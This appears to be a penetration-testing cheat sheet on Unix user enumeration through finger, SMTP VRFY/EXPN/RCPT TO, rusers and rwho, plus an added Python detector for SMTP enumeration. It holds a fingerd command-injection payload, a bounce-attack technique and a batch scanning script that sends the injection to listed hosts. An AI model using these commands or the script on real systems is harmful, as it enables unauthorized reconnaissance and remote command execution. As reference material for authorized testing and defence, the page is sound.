This page covers all common user enumeration techniques for Unix and Linux systems.
finger User Enumeration
Enumerate all users - finger @target_host
Comment: This also returns the users who are currently logged in.
Query user - finger username@target_host
Comment: Returns the name, home directory, login name and shell of the user.
Query user with string user - finger user@target_host
Comment: This command enumerates all user accounts that contain the string user.
finger Information Leaks
Enumerate all users - finger '1 2 3 4 5 6 7 8 9 0'@target_host
Comment: A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. The bug is present in all Solaris releases up to Version 8 and lets you identify user accounts on the target system.
finger 0@target_host
finger .@target_host
finger **@target_host
finger user@target_host
finger test@target_host
Comment: These queries exploit Unix fingerd services that perform a simple cross-reference of the query string against the user information fields in /etc/passwd.
Enumerate all users - finger 'a b c d e f g h'@host
Comment: This will enumerate all users on the remote target.
finger Redirection
Enumerate network - finger @target_host1@target_host2
Comment: In some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details.
Directly Exploitable finger Bugs
Command injection - finger "|/bin/ls -a /@target_host"
Comment: Poorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems).
Directly Exploitable finger Using Scripts
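#!/bin/sh
# FINGER79.out holds the target hosts and users.lst the usernames, one per line.
# All results are appended to collector.out.
for ip in $(cat FINGER79.out); do
    # Query each username in the list against the current host.
    for user in $(cat users.lst); do
        finger "$user@$ip" >> collector.out
        sleep 2
        echo "---scanning $user ---"
    done
    echo "Testing for finger Information Leaks in Solaris 8.0" >> collector.out
    finger '1 2 3 4 5 6 7 8 9 0'@"$ip" >> collector.out
    finger 0@"$ip" >> collector.out
    # Quoted so the shell does not expand ** as a glob before finger sees it.
    finger '**'@"$ip" >> collector.out
    finger 'a b c d e f g h'@"$ip" >> collector.out
    finger '|/bin/ls -a /'@"$ip" >> collector.out
    echo "---Finger finished scanning ---"
done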
User Enumeration Using the SMTP VRFY Command
telnet target_host 25
220 myhost ESMTP Sendmail 8.9.3
501 HELO requires domain address
HELO some_domain
250 myhost Hello [xx.x.x.xx], pleased to meet you
VRFY root
250 Super-User <root@myhost>
VRFY test
550 test... User unknown
User Enumeration Using the SMTP EXPN Command
telnet target_host 25
Trying target_host...
Connected to target_host.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [target_host], pleased to meet you
EXPN root
250 Super-User <root@myhost>
EXPN test
550 test... User unknown
User Enumeration Using the SMTP RCPT TO Command
telnet target_host 25
Trying target_host...
Connected to target_host.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello [target_host], pleased to meet you
MAIL FROM:root
250 root... Sender ok
RCPT TO:root
250 root... Recipient ok
RCPT TO: test
550 test... User unknown
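Seen from the mail server's side, the VRFY, EXPN and RCPT TO transcripts above share one signature: a single session that sends repeated lookups and receives 550 replies for most of them. The following Python is an added example, not part of the original page; it pairs each lookup with its reply code and flags such a session. The sample session is constructed in the style of the transcripts above, and the function names and the max_unknown threshold are assumptions.

```python
import re

# Constructed sample: client commands and server replies in the style of the
# transcripts above (not captured from a real host).
SAMPLE_SESSION = """\
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [target_host], pleased to meet you
VRFY root
250 Super-User <root@myhost>
VRFY test
550 test... User unknown
EXPN admin
550 admin... User unknown
MAIL FROM:root
250 root... Sender ok
RCPT TO:root
250 root... Recipient ok
RCPT TO: oracle
550 oracle... User unknown
"""

PROBE = re.compile(r"^(VRFY|EXPN|RCPT TO:)\s*(\S+)", re.IGNORECASE)
REPLY = re.compile(r"^(\d{3})[ -]")

def summarize(session):
    """Pair each lookup command with the code of the next server reply."""
    probes, pending = [], None
    for line in session.splitlines():
        line = line.strip()
        m = PROBE.match(line)
        if m:
            pending = (m.group(1).upper().rstrip(":"), m.group(2))
            continue
        r = REPLY.match(line)
        if r and pending:
            probes.append((*pending, int(r.group(1))))
            pending = None  # ignore continuation lines of a multi-line reply
    return probes

def disclosed_accounts(probes):
    """Names the server confirmed as valid (250), i.e. what it leaked."""
    return sorted({name for _, name, code in probes if code == 250})

def looks_like_enumeration(probes, max_unknown=2):
    """Flag a session with more than max_unknown distinct 550 lookups.
    max_unknown is an assumed threshold; tune it to normal mail traffic."""
    unknown = {name for _, name, code in probes if code == 550}
    return len(unknown) > max_unknown
```
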
rusers Enumerate Users
Local Network Users - rusers
Comment: Returns a list of the users that are logged into machines on the local network.
Enumerate users per host - rusers -al target_host
Comment: Returns a list of the users of a specific host.
rwho User Enumeration
Enumerate all users - rwho -a
Comment: All systems running the rwhod daemon will respond, and the output lists the users that are currently logged in to these systems. This service runs on port 513 (UDP).